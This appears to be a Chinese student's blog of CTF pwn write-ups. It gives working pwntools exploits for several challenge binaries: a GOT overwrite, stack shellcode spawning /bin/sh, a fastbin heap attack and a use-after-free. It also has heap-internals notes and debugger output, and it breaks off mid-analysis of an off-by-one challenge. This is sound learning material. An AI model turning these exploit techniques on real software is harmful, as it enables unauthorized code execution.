发表于 更新于 分类于

pwn的题一般是栈溢出,格式化漏洞,堆利用,逻辑漏洞

其中据我了解堆利用比栈的难度高很多,逻辑漏洞更是灵活。

这次恰好碰到一个逻辑漏洞记录一下。

1

所以可以直接写exp了

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
r=remote('node5.buuoj.cn',25642)

elf=ELF('./PicoCTF_2018_got-shell')
puts_got=elf.got['puts']
win_addr=0x0804854B

r.sendlineafter(b"I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?", hex(puts_got))

r.recv()
r.sendline(hex(win_addr))

r.interactive()

发表于 更新于 分类于

直接记重点,怎么用pwndbg找内存中的迷宫

1
2
3
4
gdb 文件名
b Step_1 #把段点下在Step_1
r  #开始运行
finish #返回主函数,此时Step_1的函数已经执行完了
  • x:查看内存
  • 49:49个单元
  • d:按照10进制查看
  • w:四个字节为一个单元(int)
  • $rsp:内存地址在rsp中

最终查内存的命令

1
x /49dw $rsp#其他题根据具体情况自己调整

1

1
2
3
4
5
6
7
1 0 0 1 1 1 1
1 0 1 1 0 0 1
1 1 1 0 1 1 1
0 0 0 1 1 0 0
1 1 1 1 0 0 0
1 0 0 0 1 1 1
1 1 1 1 0 1 1

然后我在写下本题的思路step_0和step_1都是构造迷宫。我们已经通过动态调试得到了,感觉还可以就是自己模拟伪代码构造出迷宫,但是我能力有限,以后再试试。

step_2大概得意思就是w上,s下,a左,d右的意思,然后都要走1

2

最后得到flag

1
UNCTF{ssddwdwdddssaasasaaassddddwdds}

发表于 更新于 分类于

  1. 这题主要记录一下怎么看汇编

    1

  2. 这题的思路就是在栈上写入shellcode,所以我们就要去找栈的地址。

    这里就需要要一个payload

    1
    payload = b'a'* 0x14 + p32(0x8048037)

    0x8048037就是write的返回地址,send这个payload后esp的内容就是栈上0x8048037的内容,将stack上的内容泄露出来。还就就是为什么是0x14不用加0x04,我们可以看到在retn前没有leave,所以不用+0x04。

  3. 用下面这一脚本可泄露stack的地址

    1
    2
    3
    4
    5
    6
    7
    from pwn import *
    context.log_level="debug"
    #p = process('./start')
    p=remote('node3.buuoj.cn',26163)
    payload = 'A'*0x14 + p32(0x8048087)
    p.sendafter("Let's start the CTF:",payload)
    p.interactive()

    stack的地址再加上0x14就回到我们原来的位置了,在接入shellcode就可以了。

    完整exp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    from pwn import *
     
    e=ELF('./start')
     
    context.arch=e.arch
    context.terminal=['tmux','splitw','-h']
     
    #r=process('./start')
    r=remote("node5.buuoj.cn",29188)
     
    shellcode=asm("\
                    xor edx,edx;\
                    xor ecx,ecx;\
                    push 0x0068732f;\
                    push 0x6e69622f;\
                    mov ebx,esp;\
                    mov eax,0xb;\
                    int 0x80;\
                    ")
     
    r.recvuntil("Let's start the CTF:")
    pay1=0x14*b'a'+p32(0x8048087)
    r.send(pay1)
    stack_addr=u32(r.recv(4))
    print('stack->',hex(stack_addr))
     
    r.recv()
    pay2=b'b'*20+p32(stack_addr+20)+shellcode
    r.sendline(pay2)
     
     
    r.interactive()

发表于 更新于 分类于

现在开始学堆,听说heap比stack难多了,于是我想记录一下学习记录,然后再总结一下

  1. 记录一下第一个写的heap题 [ZJCTF 2019]EasyHeap

    什么都不懂,看wp,说在edit有一个堆溢出

1

​ 思路:

2

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from pwn import *
context.log_level="debug"
#io=process("easyheap")
io=remote("node5.buuoj.cn",29842)
elf=ELF("easyheap")

def add(size,content):
    io.recvuntil("choice :")
    io.sendline("1")
    io.recvuntil("Size of Heap : ")
    io.sendline(str(size))
    io.recvuntil("Content of heap:")
    io.send(content)


def edit(index,size,content):
    io.recvuntil("choice :")
    io.sendline("2")
    io.recvuntil("Index :")
    io.sendline(str(index))
    io.recvuntil("Size of Heap : ")
    io.sendline(str(size))
    io.recvuntil("Content of heap : ")
    io.send(content)

def delete(index):
    io.recvuntil("choice :")
    io.sendline("3")
    io.recvuntil("Index :")
    io.sendline(str(index))



add(0x60,"happy")
add(0x60,"happy")
add(0x60,"happy")
delete(2)
payload = b'/bin/sh\x00' +b'A'*0x60 + p64(0x71) + p64(0x6020ad)
edit(1,len(payload),payload)
add(0x60,"happy")
add(0x60,"happy")
payload2=b'A'*0x23+p64(elf.got["free"])
edit(3,len(payload2),payload2)
payload3=p64(elf.plt["system"])
edit(0,len(payload3),payload3)
#gdb.attach(io)
#pause()
delete(1)
io.interactive()

进入2025的暑假了🎉,感觉最近学re和misc比较多🛡️🧩,pwn也写了一些🔥,可是绩点掉了不少📉,主包下定决心这个暑假一定好好学pwn💪而且一定要卷回绩点🚀,fighting👊!现在开始heap的正式学习📚➡️🧠

什么是堆?

堆是操作系统提供给程序的一块动态分配的内存区域。它的大小通常远大于栈。

其内存分配通常向上增长(从低地址向高地址)。

堆的结构

代码:

1
2
3
4
5
6
7
8
9
10
11
#include <stdio.h> 
#include <string.h> 
#include <stdlib.h>
int main(int argc, char* argv[]){ 
    char* ptr;
    ptr = (char*)malloc(20); 
    strcpy(ptr, argv[1]); 
    printf("%s\n", ptr);
    free(ptr);
    return 0; 
}

从代码中我们就可以看出堆的空间是由malloc函数分配的。

那malloc()是什么样的呢

它向操作系统请求在上分配一块连续的、指定大小的内存区域。

1
void *malloc(size_t size); #size_t size:这是唯一的参数,表示你需要分配的内存块的字节数。

堆内存整体布局:

1
2
3
4
5
6
7
8
9
低地址                                     高地址
┌───────────────┬─────────────────┬─────────────────┬─────────────────┐
│  已分配Chunk A │   空闲Chunk B   │  已分配Chunk C  │     Top Chunk   │
├───────────────┼─────────────────┼─────────────────┼─────────────────┤
│ prev_size=0   │ prev_size=0     │ prev_size=0     │ prev_size=...   │
│ size=0x21     │ size=0x41       │ size=0x31       │ size=0x20d01    │
│ user_data[...]│ FD=0xabcdef00   │ user_data[...]  │ (未分配空间)    │
│               │ BK=0x12345678   │                 │                 │
└───────────────┴─────────────────┴─────────────────┴─────────────────┘

已分配Chunk:

1
2
3
4
5
6
7
8
9
10
┌───────────────────────────┐
│        prev_size          │ ◄── 如果前一个chunk空闲,存储其大小
├───────────────────────────┤
│         size              │ ◄── 当前大小 + 标志位 (e.g. 0x20 | PREV_INUSE)
├───────────────────────────┤
│                           │
│        User Data          │ ◄── 应用程序实际使用的区域
│         (可溢出)          │
│                           │
└───────────────────────────┘

空闲Chunk (在bins中)

1
2
3
4
5
6
7
8
9
10
11
12
13
┌───────────────────────────┐
│        prev_size          │
├───────────────────────────┤
│         size              │
├───────────────────────────┤
│         FD (fd)           │ ◄── 指向同bin中下一个空闲chunk
├───────────────────────────┤
│         BK (bk)           │ ◄── 指向同bin中上一个空闲chunk
├───────────────────────────┤
│                           │
│    Unused Data Space      │ ◄── 可被元数据复用
│                           │
└───────────────────────────┘

还有一个很重要的就是了解chunk了

源码:

1
2
3
4
5
6
7
struct malloc_chunk {
  size_t      prev_size;   // 前一个chunk的大小(若前一个chunk空闲)
  size_t      size;        // 当前chunk的大小 + 状态标志位

  struct malloc_chunk* fd; // 空闲chunk:指向链表中下一个chunk(仅当空闲时有效)
  struct malloc_chunk* bk; // 空闲chunk:指向链表中前一个chunk(仅当空闲时有效)
};

chunk的结构大致也了解了,就开始了解堆溢出了

堆溢出

UAF

看了几篇uaf的文章,感觉不是很理解,对很多指针和结构体还不是很清楚,还需继续了解,于是我决定先去ctfshow了解一下堆利用的前置基础知识。

前置基础知识

pwn135

介绍了

1
2
3
1. malloc     void* malloc(size_t size);
2. calloc     void* calloc(size_t num, size_t size);
3. realloc    void* realloc(void* ptr, size_t new_size);

开始了解这三个函数

关键区别总结

函数 初始化 参数形式 主要用途
malloc size(总字节数) 分配未初始化内存
calloc 是(0) num, size(元素信息) 分配并初始化归零的内存
realloc 部分 ptr, new_size 调整已分配内存的大小

这题输入4就可以得到flag

pwn136

介绍了free这个函数

1
void free(void *ptr);  //参数:ptr - 指向先前分配的内存块的指针

如果 ptrNULL:函数不执行任何操作(安全),如果不是NULL就存在UAF漏洞了

这题输入4就可以得到flag

pwn137

介绍了

1
2
3
getpid() pid_t getpid(void);    //每个进程在创建时会被分配一个唯一的正整数作为PID。
sbrk()         void *sbrk(intptr_t increment);   //increment:字节增量(正数扩展堆,负数收缩堆,0 获取当前堆顶)。
brk()          int brk(void *addr);  addr: //目标堆结束地址(指针)。

直接运行得到flag

pwn138

介绍了mmap

mmap()函数原型

1
2
3
#include <sys/mman.h>

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
参数 类型 说明
addr void* 建议的映射起始地址(通常设为NULL,由内核决定)
length size_t 映射区域的长度(字节)
prot int 内存保护标志(控制访问权限)
flags int 映射类型和特性标志
fd int 文件描述符(匿名映射时设为-1
offset off_t 文件映射的起始偏移量(必须是页大小的整数倍)

prot保护标志(位掩码组合)

标志 说明
PROT_READ 页面可读
PROT_WRITE 页面可写
PROT_EXEC 页面可执行
PROT_NONE 页面不可访问(用于防护)

pwn139

1
2
3
//fseek() 
#include <stdio.h>
int fseek(FILE *stream, long offset, int whence);

参数说明:

参数 类型 说明
stream FILE* 指向文件对象的指针
offset long 偏移字节数(可为负数)
whence int 基准位置: SEEK_SET(文件头) SEEK_CUR(当前位置) SEEK_END(文件尾) 
1
2
3
fseek(fp, 100, SEEK_SET);   // 移动到文件头后100字节处
fseek(fp, -50, SEEK_CUR);   // 从当前位置回退50字节
fseek(fp, -20, SEEK_END);   // 移动到文件尾前20字节处
1
2
//ftell()
long ftell(FILE *stream);
1
2
//fread()
size_t fread(void *ptr, size_t size, size_t nmemb, FILE *stream);

参数说明:

参数 类型 说明
ptr void* 目标缓冲区指针
size size_t 每个元素的字节大小
nmemb size_t 要读取的元素数量
stream FILE* 文件流指针

Arena 本质:将全局堆内存划分为多个独立区域,每个线程绑定到特定 Arena,实现无锁分配。

一个线程只能有一个arena,而且每个arena都是独立且不相同的。

主线程的arena叫做main_arena,子线程的arena叫做thread_arena。

pwn140

pthread_create() - 线程创建函数

功能:创建新的执行线程

1
2
3
#include <pthread.h>
int pthread_create(pthread_t *thread, const pthread_attr_t *attr,
                   void *(*start_routine)(void *), void *arg);

参数解析:

参数 类型 说明
thread pthread_t * 输出参数,存储新线程的 ID
attr const pthread_attr_t * 线程属性(NULL 表示默认属性)
start_routine void *(*)(void *) 线程入口函数(函数指针)
arg void * 传递给入口函数的参数

二、pthread_join() - 线程等待函数

功能:阻塞当前线程,直到目标线程结束

1
int pthread_join(pthread_t thread, void **retval);

参数解析:

参数 类型 说明
thread pthread_t 要等待的线程 ID
retval void ** 存储线程返回值(NULL 表示不关心返回值)

今天pwn就学到这里了💻,去写写web大作业了🌐,明天就进入pwn141🚀,去学习一下简单的uaf💣,争取开始写堆题⛏️!

pwn141

开始了第一个UAF了。

首先我了解了一下,一些知识:

  1. UAF漏洞首先需要出现free后的指针没有指向NULL

  2. 当指针没有指向NULL的时候,此时我们free后再次申请一个和它同样大小的堆的话,会直接把之前的内存直接分给我们这次申请的。

    1
    2
    比如第一次申请16字节的内存chunk1,free(释放)后,如果指针没有指向NULL,free只能把chunk放入bin,但是指针还是指向堆块的。
    此时我们只要再次申请和上个堆块一样的内存大小,此时就会把上次的chunk1的内存风给我们了,称后申请为chunk2,此时我们修改chunk2就是在改chunk1了。

主函数:

2

print_note():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
unsigned int print_note()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, buf, 4u);
  v1 = atoi(buf);
  if ( v1 < 0 || v1 >= count )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *((_DWORD *)&notelist + v1) )
    (**((void (__cdecl ***)(_DWORD))&notelist + v1))(*((_DWORD *)&notelist + v1));
  return __readgsdword(0x14u) ^ v3;
}

我感觉这一部分有点没理解用deepseek解释一下,下面是上面的等价看的更清楚点

1
2
3
4
5
6
7
8
9
  if ( *((_DWORD *)&notelist + v1) )
    (**((void (__cdecl ***)(_DWORD))&notelist + v1))(*((_DWORD *)&notelist + v1));
-------------------------------------------------------------------------------------------------------------------    // 获取第v1个元素
FuncPtr **element = &notelist[v1]; 

if (*element != NULL) {        // 检查一级指针是否有效
    FuncPtr func = **element;  // 解引用两次获取函数地址
    func(*element);            // 调用函数,传入*element作为参数
}

add一次会申请两次(待会看add函数)chunk第一次就作为函数地址,第二个就作为参数。

add_note()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
unsigned int add_note()
{
  int v0; // esi
  int i; // [esp+Ch] [ebp-1Ch]
  int size; // [esp+10h] [ebp-18h]
  char buf[8]; // [esp+14h] [ebp-14h] BYREF
  unsigned int v5; // [esp+1Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  if ( count <= 5 )
  {
    for ( i = 0; i <= 4; ++i )
    {
      if ( !*((_DWORD *)&notelist + i) )
      {
        *((_DWORD *)&notelist + i) = malloc(8u);
        if ( !*((_DWORD *)&notelist + i) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        **((_DWORD **)&notelist + i) = print_note_content;
        printf("Note size :");
        read(0, buf, 8u);
        size = atoi(buf);
        v0 = *((_DWORD *)&notelist + i);
        *(_DWORD *)(v0 + 4) = malloc(size);
        if ( !*(_DWORD *)(*((_DWORD *)&notelist + i) + 4) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        printf("Content :");
        read(0, *(void **)(*((_DWORD *)&notelist + i) + 4), size);
        puts("Success !");
        ++count;
        return __readgsdword(0x14u) ^ v5;
      }
    }
  }
  else
  {
    puts("Full!");
  }
  return __readgsdword(0x14u) ^ v5;
}

print_note_content

1
2
3
4
int __cdecl print_note_content(int a1)
{
  return puts(*(const char **)(a1 + 4));
}

print_note_content其实就是个puts函数。add_note()每次都会申请两个堆块。

del_note();

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
unsigned int del_note()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, buf, 4u);
  v1 = atoi(buf);
  if ( v1 < 0 || v1 >= count )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *((_DWORD *)&notelist + v1) )
  {
    free(*(void **)(*((_DWORD *)&notelist + v1) + 4));
    free(*((void **)&notelist + v1));
    puts("Success");
  }
  return __readgsdword(0x14u) ^ v3;
}

可以看到free最后指针没有指向NULL,存在UAF漏洞。

use()

1
2
3
4
int use()
{
  return system("cat /ctfshow_flag");
}

这里还有个后门函数。

分析到这里我们就可以来构造攻击思路了

1
2
3
4
5
6
7
8
9
10
首先我们要申请两个堆块(因为我们修改chunk的时候,add会会申请两个堆块一个用来存储print_note_content的地址,一个用来存储content).
先申请两次add,就是4个堆块
chunk0 ------->指向print_note_content  8字节
chunk0.0: ---->指向content0            大于8字节即可 
chunk1 ------->指向print_note_content  8字节
chunk1.1 ----->指向content1            大于8字节即可
-------------------------------------------------------------------------------------------------------------------
free 0和1后
chunk2 ------->chunk1    8字节
chunk2.2 ----->chunk0    8字节   此时输入use的地址就可将其覆改从而执行use,getshell
1
2
3
4
5
6
7
8
9
[*] '/home/linkpwn/pwn'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

保护几乎全开了。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
#from LibcSearcher import *
context(arch = 'i386',os = 'linux',log_level = 'debug')
#p=process("./pwn141")
p=remote("pwn.challenge.ctf.show",xxxx)
use = 0x08049684
#定义三个函数方便用
def add_note(size,content):
    p.sendlineafter("choice :",b"1")
    p.sendlineafter("Note size :",str(size))
    p.sendlineafter("Content :",content)	
def del_note(index):
    p.sendlineafter("choice :","2")
    p.sendlineafter("Index :",str(index))
def print_note(index):
    p.sendlineafter(b"choice :",b"3")
    p.sendlineafter(b"Index :",str(index))
    
add_note(32,"aaaa")
add_note(32,"bbbb")

del_note(0)
del_note(1)

add_note(8,p32(use))

print_note(0)
p.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[DEBUG] Received 0x12 bytes:
    b'cat: /ctfshow_flag'
cat: /ctfshow_flag[DEBUG] Received 0x1e bytes:
    00000000  3a 20 e6 b2  a1 e6 9c 89  e9 82 a3 e4  b8 aa e6 96  │: ··│····│····│····│
    00000010  87 e4 bb b6  e6 88 96 e7  9b ae e5 bd  95 0a        │····│····│····│··│
    0000001e
: 没有那个文件或目录
//本地打通
-------------------------------------------------------------------------------------------------------------------
[DEBUG] Received 0x106 bytes:
    b'ctfshow{9f96328a-9405-447f-97a5-c2b73d8307e1}\n'
    b'-------------------------\n'
    b'       CTFshowNote       \n'
    b'-------------------------\n'
    b'    1. Add note          \n'
    b'    2. Delete note       \n'
    b'    3. Print note        \n'
    b'    4. Exit              \n'
    b'-------------------------\n'
    b'choice :'
ctfshow{9f96328a-9405-447f-97a5-c2b73d8307e1}
//远程打通

今天上午就学到这里了,下午继续干web大作业,完整在进行pwndbg调色继续升入了解堆。

申请一个堆块时

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x804d008
Size: 0x190 (with flag bits: 0x191)

Allocated chunk | PREV_INUSE
Addr: 0x804d198
Size: 0x10 (with flag bits: 0x11)    //指向print_note_content chunk0

Allocated chunk | PREV_INUSE
Addr: 0x804d1a8
Size: 0x30 (with flag bits: 0x31)  //content0---->chunk0.0

Top chunk | PREV_INUSE
Addr: 0x804d1d8
Size: 0x21e28 (with flag bits: 0x21e29)

申请两个堆块时

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x804d008
Size: 0x190 (with flag bits: 0x191)

Allocated chunk | PREV_INUSE
Addr: 0x804d198
Size: 0x10 (with flag bits: 0x11)     //指向print_note_content chunk0

Allocated chunk | PREV_INUSE
Addr: 0x804d1a8
Size: 0x30 (with flag bits: 0x31)    //content0---->chunk0.0

Allocated chunk | PREV_INUSE
Addr: 0x804d1d8
Size: 0x10 (with flag bits: 0x11)   //指向print_note_content chunk1

Allocated chunk | PREV_INUSE
Addr: 0x804d1e8
Size: 0x30 (with flag bits: 0x31)  //content1---->chunk1.1

Top chunk | PREV_INUSE
Addr: 0x804d218
Size: 0x21de8 (with flag bits: 0x21de9)
1
2
3
4
5
6
7
8
9
pwndbg> x/30wx 0x804d198
0x804d198:	0x00000000	0x00000011	0x080492d6	0x0804d1b0   //0x080492d6 存放print_note_content chunk0
0x804d1a8:	0x00000000	0x00000031	0x61616161	0x0000000a   //0x61616161 aaaa
0x804d1b8:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d1c8:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d1d8:	0x00000000	0x00000011	0x080492d6	0x0804d1f0   //0x080492d6 存放print_note_content chunk0
0x804d1e8:	0x00000000	0x00000031	0x62626262	0x0000000a   //0x62626262 bbbb
0x804d1f8:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d208:	0x00000000	0x00000000
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pwndbg> telescope 0x080492d6
00:0000│  0x80492d6 (print_note_content) ◂— endbr32 
01:0004│  0x80492da (print_note_content+4) ◂— push ebp
02:0008│  0x80492de (print_note_content+8) ◂— sub esp, 4
03:000c│  0x80492e2 (print_note_content+12) ◂— mov word ptr [esi], es
04:0010│  0x80492e6 (print_note_content+16) ◂— add eax, 0x2d1a
05:0014│  0x80492ea (print_note_content+20) ◂— add byte ptr [ebx + 0x528b0855], cl
06:0018│  0x80492ee (print_note_content+24) ◂— mov edx, dword ptr [edx + 4]
07:001c│  0x80492f2 (print_note_content+28) ◂— in al, dx
pwndbg> telescope 0x080492d6
00:0000│  0x80492d6 (print_note_content) ◂— endbr32 
01:0004│  0x80492da (print_note_content+4) ◂— push ebp
02:0008│  0x80492de (print_note_content+8) ◂— sub esp, 4
03:000c│  0x80492e2 (print_note_content+12) ◂— mov word ptr [esi], es
04:0010│  0x80492e6 (print_note_content+16) ◂— add eax, 0x2d1a
05:0014│  0x80492ea (print_note_content+20) ◂— add byte ptr [ebx + 0x528b0855], cl
06:0018│  0x80492ee (print_note_content+24) ◂— mov edx, dword ptr [edx + 4]
07:001c│  0x80492f2 (print_note_content+28) ◂— in al, dx

可以很明显看到0x080492d6和0x080492d6存放的是print_note_content chunk0。再释放两个堆块,可以看到这些地址都是空闲的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x804d008
Size: 0x190 (with flag bits: 0x191)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0x804d198
Size: 0x10 (with flag bits: 0x11)
fd: 0x804d

Free chunk (tcachebins) | PREV_INUSE
Addr: 0x804d1a8
Size: 0x30 (with flag bits: 0x31)
fd: 0x804d

Free chunk (tcachebins) | PREV_INUSE
Addr: 0x804d1d8
Size: 0x10 (with flag bits: 0x11)
fd: 0x80451ed

Free chunk (tcachebins) | PREV_INUSE
Addr: 0x804d1e8
Size: 0x30 (with flag bits: 0x31)
fd: 0x80451fd

Top chunk | PREV_INUSE
Addr: 0x804d218
Size: 0x21de8 (with flag bits: 0x21de9)

然后我们再申请两个8字节堆块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x804d008
Size: 0x190 (with flag bits: 0x191)

Allocated chunk | PREV_INUSE
Addr: 0x804d198
Size: 0x10 (with flag bits: 0x11)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0x804d1a8
Size: 0x30 (with flag bits: 0x31)
fd: 0x804d

Allocated chunk | PREV_INUSE
Addr: 0x804d1d8
Size: 0x10 (with flag bits: 0x11)

Free chunk (tcachebins) | PREV_INUSE
Addr: 0x804d1e8
Size: 0x30 (with flag bits: 0x31)
fd: 0x80451fd

Top chunk | PREV_INUSE
Addr: 0x804d218
Size: 0x21de8 (with flag bits: 0x21de9)

看到0x804d198和0x804d1d8再次被用上了,刚刚我在chunk2的content输入flag,现在我们看看0x804d1d8和0x804d198所指的内容是什么。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
pwndbg> x/30wx 0x804d1d8
0x804d1d8:	0x00000000	0x00000011	0x080492d6	0x0804d1a0 //0x080492d6  ---->print_note_content
0x804d1e8:	0x00000000	0x00000031	0x080451fd	0x88bc415d
0x804d1f8:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d208:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d218:	0x00000000	0x00021de9	0x00000000	0x00000000
0x804d228:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d238:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d248:	0x00000000	0x00000000
pwndbg> x/30wx 0x804d198
0x804d198:	0x00000000	0x00000011	0x67616c66	0x0000000a   //0x67616c66 flag
0x804d1a8:	0x00000000	0x00000031	0x0000804d	0x88bc415d
0x804d1b8:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d1c8:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d1d8:	0x00000000	0x00000011	0x080492d6	0x0804d1a0
0x804d1e8:	0x00000000	0x00000031	0x080451fd	0x88bc415d
0x804d1f8:	0x00000000	0x00000000	0x00000000	0x00000000
0x804d208:	0x00000000	0x00000000
pwndbg> telescope 0x080492d6
00:0000│  0x80492d6 (print_note_content) ◂— endbr32 
01:0004│  0x80492da (print_note_content+4) ◂— push ebp
02:0008│  0x80492de (print_note_content+8) ◂— sub esp, 4
03:000c│  0x80492e2 (print_note_content+12) ◂— mov word ptr [esi], es
04:0010│  0x80492e6 (print_note_content+16) ◂— add eax, 0x2d1a
05:0014│  0x80492ea (print_note_content+20) ◂— add byte ptr [ebx + 0x528b0855], cl
06:0018│  0x80492ee (print_note_content+24) ◂— mov edx, dword ptr [edx + 4]
07:001c│  0x80492f2 (print_note_content+28) ◂— in al, dx

此时如果我们输入的不是flag而是use的地址的话,0x804d198指向的就是use的地址,我们此时只要执行一下3,就能执行use了。

OK现在这个UAF完成的挺好 👌🔥,明日继续 pwn142 🎯 off_by_one 🧠💥

off_by_one

今日开始学习off_by_one,进入pwn142之前我打算先学习一下有关off_by_one的知识

看了几篇文章我对堆上的off_by_one理解是:

  1. prinf函数的%s的结尾会自动加上’/x00’,造成单字节漏洞,就是溢出了一个字节,如果两个堆块紧邻的话,就会把溢出的这个字节挤到下一个堆块,覆盖先一个堆块的低字节。

  2. 还有一中就是for循环导致的例如

    1
    2
    3
    4
    5
    6
    7
    8
    int gett(char *ptr , int size){
       for(i = 0;i <= 32; i++){
           vul(i) = getchar();
       }
    }    

    chunk0 = (*char)malloc(32)
    gett(chunk0,32);

    这里就会导致for循环的时候多读入了一个字节,造成单字节溢出。

先在开始正式开始pwn142,写完这个今天的任务就算完成。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  init(argc, argv, envp);
  logo();
  while ( 1 )
  {
    menu();
    read(0, buf, 4uLL);
    switch ( atoi(buf) )
    {
      case 1:
        create_heap();
        break;
      case 2:
        edit_heap();
        break;
      case 3:
        show_heap();
        break;
      case 4:
        delete_heap();
        break;
      case 5:
        exit(0);
      default:
        puts("Invalid Choice");
        break;
    }
  }
}

首先看main函数,有 create_heap();,edit_heap();, show_heap();, delete_heap();, exit(0);这五个函数,我们依次来看看

create_heap():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
unsigned __int64 create_heap()
{
  __int64 v0; // rbx
  int i; // [rsp+4h] [rbp-2Ch]
  size_t size; // [rsp+8h] [rbp-28h]
  char buf[8]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i <= 9; ++i )
  {
    if ( !*((_QWORD *)&heaparray + i) )
    {
      *((_QWORD *)&heaparray + i) = malloc(0x10uLL);  //申请chunk0
      if ( !*((_QWORD *)&heaparray + i) )
      {
        puts("Allocate Error");
        exit(1);
      }
      printf("Size of Heap : ");
      read(0, buf, 8uLL);
      size = atoi(buf);
      v0 = *((_QWORD *)&heaparray + i); 
      *(_QWORD *)(v0 + 8) = malloc(size);  //把chunk1 + 8的位置复制给chunk0.0的指针,同时申请chunk0.0
      if ( !*(_QWORD *)(*((_QWORD *)&heaparray + i) + 8LL) )
      {
        puts("Allocate Error");
        exit(2);
      }
      **((_QWORD **)&heaparray + i) = size; //把chunk1赋值为size
      printf("Content of heap:");
      read_input(*(_QWORD *)(*((_QWORD *)&heaparray + i) + 8LL), size);
      puts("SuccessFul");
      return __readfsqword(0x28u) ^ v5;
    }
  }
  return __readfsqword(0x28u) ^ v5;
}

edit_heap()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
unsigned __int64 edit_heap()
{
  int v1; // [rsp+0h] [rbp-10h]
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  v1 = atoi(buf);
  if ( (unsigned int)v1 >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *((_QWORD *)&heaparray + v1) )
  {
    printf("Content of heap : ");
    read_input(*(_QWORD *)(*((_QWORD *)&heaparray + v1) + 8LL), **((_QWORD **)&heaparray + v1) + 1LL);
    puts("Done !");
  }
  else
  {
    puts("No such heap !");
  }
  return __readfsqword(0x28u) ^ v3;
}

# read_input(*(_QWORD *)(*((_QWORD *)&heaparray + v1) + 8LL), **((_QWORD **)&heaparray + v1) + 1LL);
# 可以发现修改的时候会多出来一个字节,就出现了off_by_one的漏洞了

delete_heap();在本题没什么大用处,就不分析了

show_heap()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
unsigned __int64 show_heap()
{
  int v1; // [rsp+0h] [rbp-10h]
  char buf[4]; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  v1 = atoi(buf);
  if ( (unsigned int)v1 >= 0xA )
  {
    puts("Out of bound!");
    _exit(0);
  }
